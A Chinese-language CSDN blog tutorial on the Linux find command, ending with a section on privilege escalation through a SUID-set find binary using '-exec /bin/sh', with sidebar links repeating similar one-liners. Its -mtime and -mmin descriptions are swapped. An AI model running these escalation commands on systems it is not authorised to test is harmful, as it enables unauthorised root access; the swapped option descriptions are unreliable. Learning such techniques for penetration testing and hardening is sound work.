find基础命令与提权教程

最新推荐文章于 2024-03-12 16:39:49 发布
最新推荐文章于 2024-03-12 16:39:49 发布
阅读量1.1w 收藏 43
点赞数 10
分类专栏: 安全工具 文章标签: linux 安全 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912169/article/details/105845909
版权

find基础命令与提权教程

find命令用来在指定目录下查找文件,若不指定目录则视为当前目录

  1. find常用参数

语法:find [path…] [expression]

path为查找路径,.为当前路径,/为根目录

expression即为参数

-name: 按文件名查找文件

-perm: 按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限

-user: 按照文件属主来查找

-size n: 文件大小是n个单位

-type:

  1. d:目录
  2. f:文件
  3. c:字符设备文件
  4. b:块设备文件

-atime n: time表示日期,时间单位是day,查找系统最后n*24小时内曾被存取过的文件或目录

-amin n: 查找系统最后n分钟内曾被存取过的文件或目录

-ctime n: 查找系统中最后n*24小时内曾被改变文件状态(权限、所属组、位置…)的文件或目录

-cmin n: 查找系统中最后N分钟内曾被改变文件状态(权限、所属组、位置…)的文件或目录

-mtime: 查找系统中最后N分钟内曾被更改过的文件或目录

-mmin n: 查找系统中最后n*24小时内曾被更改过的文件或目录

-print: 将匹配的文件输出到标准输出

-exec: find命令对匹配的文件执行该参数所给出的shell命令。相应命令的形式为’command’ { } ;,注意{ }和\;之间的空格。

  1. find实例

1.在当前目录下查找文件名以txt为后缀的文件

find -name '*.txt'

在这里插入图片描述

2.在root目录下查找大于50m小于100m的文件

find / -size +50M -size -100M -type f

image-20200429172745324

3.查找在10分钟内读取过的文件

find / -amin 10 -type f

image-20200429174922521

4.查找权限为777的文件或目录并排序

find -perm -777 -type f |sort

image-20200429175224845

5.查找当前目录下所有.txt文件并把他们拼接起来写入到all.txt文件中

find . -type f -name "*.txt" -exec cat {} \;> all.txt

image-20200429175546430

6.因为单行命令中-exec参数中无法使用多个命令,以下方法可以实现在-exec之后接受多条命令

find '1.txt' -exec ./text.sh {} \;

text.sh内容

image-20200429180229545
命令结果
image-20200429180247895

  1. find命令提权

1.使用find命令查看拥有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

image-20200429180608916
2.使用exec查看当前用户

find text -exec "whoami" \;

text必须是可以找到的文件名,不然会出错,可以看到是root权限,如果这里显示的不是可以接着看下一步

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Dhsnk9w4-1588155429520)(upload%5Cimage-20200429181002364.png)]

3.使用find命令来提权

find text.sh -exec "/bin/sh" \;

image-20200429181135512

hyled-Ava
关注
  • 10
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
find命令提权常用命令
墨痕诉清风的博客
06-07 1727
查看具有suid 权限的可执行二进制程序 查找root权限可写文件 其它用户也可以写 查找root权限可写、可执行文件 其它用户也可以写、执行 查找当前用户可读文件 find提权 若find命令suid在输出结果中,执行如下代码,提权...
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1743
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.命令执行者要对该程序文件拥有执行(x)权限.命令执行者在执行该程序时获得该程序文件属主的身份.
find命令提权以及反弹shell复现
qq_40898302的博客
04-21 7431
关于linux系统的find命令提权复现
利用find权限提权
weixin_43239236的博客
01-23 1112
1.如果find有权限 先测试 find / -type f -name getflag -exec “whoami” ; find / -type f -name getflag -exec “/bin/sh” ;
Linux中 2>/dev/null(标准错误重定向操作符)的用法
最新发布
日拱一卒,玉汝于成
03-12 287
这个错误信息将不会出现在屏幕上。这在需要抑制命令的错误输出以简化输出结果或者只关注成功匹配项时非常有用。是一个标准错误重定向操作符。它用于将命令执行过程中产生的所有标准错误输出(stderr)丢弃或忽略。后,该命令在执行过程中如果出现任何错误消息,这些错误消息都不会显示在终端上,而是直接被发送到。命令通常会输出一个错误信息,但因为添加了。所以,当命令后面加上。文件不存在于系统中,在Linux系统中,
详解Linux中两个查找命令locate和find教程
09-15
linux中有很多查找命令,今天小编抽空给大家讲解find和locate两个命令,非常不错,具有参考借鉴价值,需要的朋友参考下吧
Linux 基础命令 — find
01-07
命令介绍 命令:find 在指定路径遍历查找文件 用法:find [-H] [-L] [-P] [-Olevel] [-D help|tree|search|stat|rates|opt|exec] [path…] [expression find 路径 选项 表达式 命令选项 [root@fp-21 ~]# find --help Usage: find [-H] [-L] [-P] [-Olevel] [-D help|tree|search|stat|rates|opt|exec] [path...] [expression] -name # 根据文件名中查找 -iname # 根据文件
linux 提权总结
weixin_51681694的博客
06-13 6550
会继续补充.....
DC-1 (FIND提权)
E1even的博客
08-24 657
文章目录扫描存活主机及其开放端口FLAG1获取:利用MSF拿下入口FLAG2:配置文件泄露信息FLAG3:EXP添加管理员账户FLAG4、5:linux提权之FIND DC涉及到linux提权,前面的信息搜集阶段的操作也是很不错的实践方法,接下来几天将会持续更新完毕DC系列 靶机:192.168.78.133 kali:192.168.78.131 配置: kali和靶机都配置成net模式 扫描存活主机及其开放端口 首先查看一下kali网卡的ip段: ifconfig kali和靶机在同一网卡里面,
linux提权
ccssggoo的博客
06-30 3577
linux提权的各种方法
常用Linux提权(非漏洞)
Thegentlest的博客
08-31 4629
编译如下文件并添加SUID权限,在普通用户下执行该文件即可获得root的shell。}Note:上述SUID提权只是一部分并不全面,如需更多SUID提权详细信息可以参考如下链接GTFOBins。二、sudo命令提权当sudoers文件中某些用户包含某些命令的sudo权限时,可能导致提权问题发生。sudo -l查看当前用户有哪些sudo权限1.git执行!/bin/bash可以直接提权成功,less、man同理。...
linux find命令说明
12-02
linux find命令说明
find命令:基于文件属性查找
01-09
find命令:基于文件属性查找 find [目录] -name 文件名* 表示匹配正则 -maxdepth 1 表示当前目录 -type(f/d) -size(+大于/-小于) -perm(permission) -exec [命令] {} \;或者+ 后面跟一个命令,对...
find命令查询指定时间的大文件并删除
01-09
Linux下find命令查询指定时间的大文件并删除 1.常规方法 1.1 语法: 使用find命令和rm命令结合使用删除指定时间的文件 --时间单位为天 find 查询路径 -ctime/-mtime/-atime 时间范围 -name 文件名称 -type f -exec ...
find / -perm -4000 的含义
boqiangqing9840的博客
07-14 2862
//学习笔记 查找系统所有文件中拥有suid特殊权限的文件-perm匹配权限4000 2000 1000分别表示SUID SGID SBIT1.普通文件,文件的权限一般三位,777最高文件权限-perm -0777搜索的就是最高权限的文件rwxrwxrwx-perm +0777搜索的只要包含rwxrwxrwx任意一个的文件2.特殊文件,包含权限位置四位,7000为最高,即–s–s–t,同样的方法...
linux的一些提权方式
shurongyugong的博客
11-29 771
在搭建场景时候,蚁剑上线后发现是www用户,限制好大,修改一些东西使他能够提权。后面还可以往蚁剑上面上传msf木马,然后在这里执行文件,这一msf也用以root用户权限上线了。可以看到此时我们并不是完全的root权限,但是编辑权限是够的,接下来为。接下来可以开通监听,获取反弹shell。查看普通用户没有权限查看的文件。再开一个监听,并重新上传新脚本。铛铛,此时就是root权限了。
DC-1渗透笔记SUID-find提权
qq_74157343的博客
09-12 100
wp,DC-1
Linux系统提权思路
热门推荐
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
小记SUID -find提权
nini_boom的博客
11-01 2204
find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} ; 如果有find执行 touch test find . -exec /bin/sh ; -quit 这时候,你就拥有...
kail linux用户提权
06-09
在Kali Linux中,有许多提权方法,这里只列举几个常见的方法: 1. 利用SUID二进制文件:在Kali Linux中,有一些二进制文件被设置了SUID权限,这意味着如果你以root权限运行这些文件,你也将获得root权限。你可以通过执行命令“find / -perm -u=s -type f 2>/dev/null”来查找这些二进制文件,然后尝试利用它们来提权。 2. 利用sudo:如果你的用户被添加到sudoers文件中,你可以使用sudo命令以root权限运行其他命令。你可以查看sudoers文件,或者尝试使用sudo su命令来获取root权限。 3. 利用漏洞:Kali Linux中的许多应用程序都有漏洞,你可以尝试利用它们来提权。你可以使用漏洞扫描工具,如Metasploit或Nmap,来查找漏洞。 需要注意的是,提权是一项非常危险的操作,应该谨慎对待,并且只在必要时进行。不当的提权操作可能会导致系统崩溃或数据丢失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值